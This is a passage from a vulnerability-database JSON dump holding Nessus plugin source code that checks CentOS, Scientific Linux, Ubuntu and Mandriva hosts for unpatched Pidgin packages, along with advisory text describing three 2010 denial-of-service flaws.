packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pidgin packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nAn input sanitization flaw was found in the way Pidgin's MSN protocol\nimplementation handled MSNSLP invitations. A remote attacker could\nsend a specially crafted INVITE request that would cause a denial of\nservice (memory corruption and Pidgin crash). (CVE-2010-0277)\n\nA denial of service flaw was found in Finch's XMPP chat\nimplementation, when using multi-user chat. If a Finch user in a\nmulti-user chat session were to change their nickname to contain the\nHTML 'br' element, it would cause Finch to crash. (CVE-2010-0420)\n\nRed Hat would like to thank Sadrul Habib Chowdhury of the Pidgin\nproject for responsibly reporting the CVE-2010-0420 issue.\n\nA denial of service flaw was found in the way Pidgin processed\nemoticon images. A remote attacker could flood the victim with\nemoticon images during mutual communication, leading to excessive CPU\nuse. (CVE-2010-0423)\n\nThese packages upgrade Pidgin to version 2.6.6. Refer to the Pidgin\nrelease notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users are advised to upgrade to these updated packages,\nwhich correct these issues. Pidgin must be restarted for this update\nto take effect.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2010-February/016511.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?40b0472b\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2010-February/016512.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bd79f59a\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2010-February/016523.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0347372a\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2010-February/016524.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2cf9c55c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"finch-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"finch-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"finch-devel-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"finch-devel-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"libpurple-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"libpurple-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"libpurple-devel-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"libpurple-devel-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"libpurple-perl-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"libpurple-perl-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"libpurple-tcl-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"libpurple-tcl-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"pidgin-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"pidgin-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"pidgin-devel-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"pidgin-devel-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"pidgin-perl-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"pidgin-perl-2.6.6-1.el4\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"finch-2.6.6-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"finch-devel-2.6.6-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-2.6.6-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-devel-2.6.6-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-perl-2.6.6-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-tcl-2.6.6-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-2.6.6-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-devel-2.6.6-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-perl-2.6.6-1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-29T13:33:24", "references": ["http://www.nessus.org/u?e874127e"], "pluginID": "60738", "edition": 3, "description": "CVE-2010-0277 pidgin MSN protocol plugin memory corruption\n\nCVE-2010-0420 pidgin: Finch XMPP MUC Crash\n\nCVE-2010-0423 pidgin: Smiley Denial of Service\n\nAn input sanitization flaw was found in the way Pidgin's MSN protocol implementation handled MSNSLP invitations. A remote attacker could send a specially crafted INVITE request that would cause a denial of service (memory corruption and Pidgin crash). (CVE-2010-0277)\n\nA denial of service flaw was found in Finch's XMPP chat implementation, when using multi-user chat. If a Finch user in a multi-user chat session were to change their nickname to contain the HTML 'br' element, it would cause Finch to crash. (CVE-2010-0420)\n\nA denial of service flaw was found in the way Pidgin processed emoticon images. A remote attacker could flood the victim with emoticon images during mutual communication, leading to excessive CPU use. (CVE-2010-0423)\n\nPidgin must be restarted for this update to take effect.", "reporter": "Tenable", "published": "2012-08-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "Scientific Linux Security Update : pidgin on SL4.x, SL5.x i386/x86_64", "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "modified": "2016-12-14T00:00:00", "id": "SL_20100218_PIDGIN_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60738", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60738);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2016/12/14 20:33:26 $\");\n\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n\n script_name(english:\"Scientific Linux Security Update : pidgin on SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2010-0277 pidgin MSN protocol plugin memory corruption\n\nCVE-2010-0420 pidgin: Finch XMPP MUC Crash\n\nCVE-2010-0423 pidgin: Smiley Denial of Service\n\nAn input sanitization flaw was found in the way Pidgin's MSN protocol\nimplementation handled MSNSLP invitations. A remote attacker could\nsend a specially crafted INVITE request that would cause a denial of\nservice (memory corruption and Pidgin crash). (CVE-2010-0277)\n\nA denial of service flaw was found in Finch's XMPP chat\nimplementation, when using multi-user chat. If a Finch user in a\nmulti-user chat session were to change their nickname to contain the\nHTML 'br' element, it would cause Finch to crash. (CVE-2010-0420)\n\nA denial of service flaw was found in the way Pidgin processed\nemoticon images. A remote attacker could flood the victim with\nemoticon images during mutual communication, leading to excessive CPU\nuse. (CVE-2010-0423)\n\nPidgin must be restarted for this update to take effect.\"\n );\n # http://listserv.fnal.gov/scripts/wa.exe?A2=ind1002&L=scientific-linux-errata&T=0&P=1520\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e874127e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"finch-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"finch-devel-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"libpurple-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"libpurple-devel-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"libpurple-perl-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"libpurple-tcl-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"pidgin-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"pidgin-devel-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"pidgin-perl-2.6.6-1.el4\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"finch-2.6.6-1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"finch-devel-2.6.6-1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libpurple-2.6.6-1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libpurple-devel-2.6.6-1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libpurple-perl-2.6.6-1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libpurple-tcl-2.6.6-1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"pidgin-2.6.6-1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"pidgin-devel-2.6.6-1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"pidgin-perl-2.6.6-1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-17T17:38:24", "references": [], "pluginID": "44688", "description": "Fabian Yamaguchi discovered that Pidgin incorrectly validated all fields of an incoming message in the MSN protocol handler. A remote attacker could send a specially crafted message and cause Pidgin to crash, leading to a denial of service. (CVE-2010-0277)\n\nSadrul Habib Chowdhury discovered that Pidgin incorrectly handled certain nicknames in Finch group chat rooms. A remote attacker could use a specially crafted nickname and cause Pidgin to crash, leading to a denial of service. (CVE-2010-0420)\n\nAntti Hayrynen discovered that Pidgin incorrectly handled large numbers of smileys. A remote attacker could send a specially crafted message and cause Pidgin to become unresponsive, leading to a denial of service. (CVE-2010-0423).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2010-02-23T00:00:00", "title": "Ubuntu 8.04 LTS / 8.10 / 9.04 / 9.10 : pidgin vulnerabilities (USN-902-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2018-08-15T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libpurple0", "p-cpe:/a:canonical:ubuntu_linux:pidgin-dev", "p-cpe:/a:canonical:ubuntu_linux:pidgin-data", "p-cpe:/a:canonical:ubuntu_linux:finch", "p-cpe:/a:canonical:ubuntu_linux:libpurple-dev", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:finch-dev", "cpe:/o:canonical:ubuntu_linux:9.10", "p-cpe:/a:canonical:ubuntu_linux:gaim", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04", "p-cpe:/a:canonical:ubuntu_linux:libpurple-bin", "p-cpe:/a:canonical:ubuntu_linux:pidgin-dbg", "p-cpe:/a:canonical:ubuntu_linux:pidgin"], "id": "UBUNTU_USN-902-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44688", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-902-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44688);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/15 12:24:49\");\n\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_xref(name:\"USN\", value:\"902-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 8.10 / 9.04 / 9.10 : pidgin vulnerabilities (USN-902-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fabian Yamaguchi discovered that Pidgin incorrectly validated all\nfields of an incoming message in the MSN protocol handler. A remote\nattacker could send a specially crafted message and cause Pidgin to\ncrash, leading to a denial of service. (CVE-2010-0277)\n\nSadrul Habib Chowdhury discovered that Pidgin incorrectly handled\ncertain nicknames in Finch group chat rooms. A remote attacker could\nuse a specially crafted nickname and cause Pidgin to crash, leading to\na denial of service. (CVE-2010-0420)\n\nAntti Hayrynen discovered that Pidgin incorrectly handled large\nnumbers of smileys. A remote attacker could send a specially crafted\nmessage and cause Pidgin to become unresponsive, leading to a denial\nof service. (CVE-2010-0423).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:finch-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpurple-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpurple-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpurple0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pidgin-data\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pidgin-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pidgin-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04|8\\.10|9\\.04|9\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 8.10 / 9.04 / 9.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"finch\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"finch-dev\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"gaim\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpurple-bin\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpurple-dev\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpurple0\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pidgin\", pkgver:\"1:2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pidgin-data\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pidgin-dbg\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pidgin-dev\", pkgver:\"2.4.1-1ubuntu2.9\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"finch\", pkgver:\"2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"finch-dev\", pkgver:\"2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpurple-bin\", pkgver:\"2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpurple-dev\", pkgver:\"2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpurple0\", pkgver:\"2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pidgin\", pkgver:\"1:2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pidgin-data\", pkgver:\"2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pidgin-dbg\", pkgver:\"2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pidgin-dev\", pkgver:\"2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"finch\", pkgver:\"2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"finch-dev\", pkgver:\"2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpurple-bin\", pkgver:\"2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpurple-dev\", pkgver:\"2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpurple0\", pkgver:\"2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pidgin\", pkgver:\"1:2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pidgin-data\", pkgver:\"2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pidgin-dbg\", pkgver:\"2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pidgin-dev\", pkgver:\"2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"finch\", pkgver:\"2.6.2-1ubuntu7.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"finch-dev\", pkgver:\"2.6.2-1ubuntu7.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libpurple-bin\", pkgver:\"2.6.2-1ubuntu7.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libpurple-dev\", pkgver:\"2.6.2-1ubuntu7.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libpurple0\", pkgver:\"2.6.2-1ubuntu7.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"pidgin\", pkgver:\"1:2.6.2-1ubuntu7.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"pidgin-data\", pkgver:\"2.6.2-1ubuntu7.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"pidgin-dbg\", pkgver:\"2.6.2-1ubuntu7.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"pidgin-dev\", pkgver:\"2.6.2-1ubuntu7.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-dev / gaim / libpurple-bin / libpurple-dev / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-02T07:46:21", "references": ["http://pidgin.im/news/security/"], "pluginID": "44664", "description": "Multiple security vulnerabilities has been identified and fixed in pidgin :\n\nCertain malformed SLP messages can trigger a crash because the MSN protocol plugin fails to check that all pieces of the message are set correctly (CVE-2010-0277).\n\nIn a user in a multi-user chat room has a nickname containing '<br>' then libpurple ends up having two users with username ' ' in the room, and Finch crashes in this situation. We do not believe there is a possibility of remote code execution (CVE-2010-0420).\n\noCERT notified us about a problem in Pidgin, where a large amount of processing time will be used when inserting many smileys into an IM or chat window. This should not cause a crash, but Pidgin can become unusable slow (CVE-2010-0423).\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0 customers.\n\nThis update provides pidgin 2.6.6, which is not vulnerable to these issues.", "edition": 4, "reporter": "Tenable", "published": "2010-02-19T00:00:00", "title": "Mandriva Linux Security Advisory : pidgin (MDVSA-2010:041)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:pidgin-bonjour", "p-cpe:/a:mandriva:linux:lib64finch0", "p-cpe:/a:mandriva:linux:lib64purple0", "p-cpe:/a:mandriva:linux:pidgin-tcl", "p-cpe:/a:mandriva:linux:lib64purple-devel", "p-cpe:/a:mandriva:linux:pidgin-mono", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:pidgin-plugins", "cpe:/o:mandriva:linux:2009.1", "p-cpe:/a:mandriva:linux:libpurple0", "p-cpe:/a:mandriva:linux:pidgin", 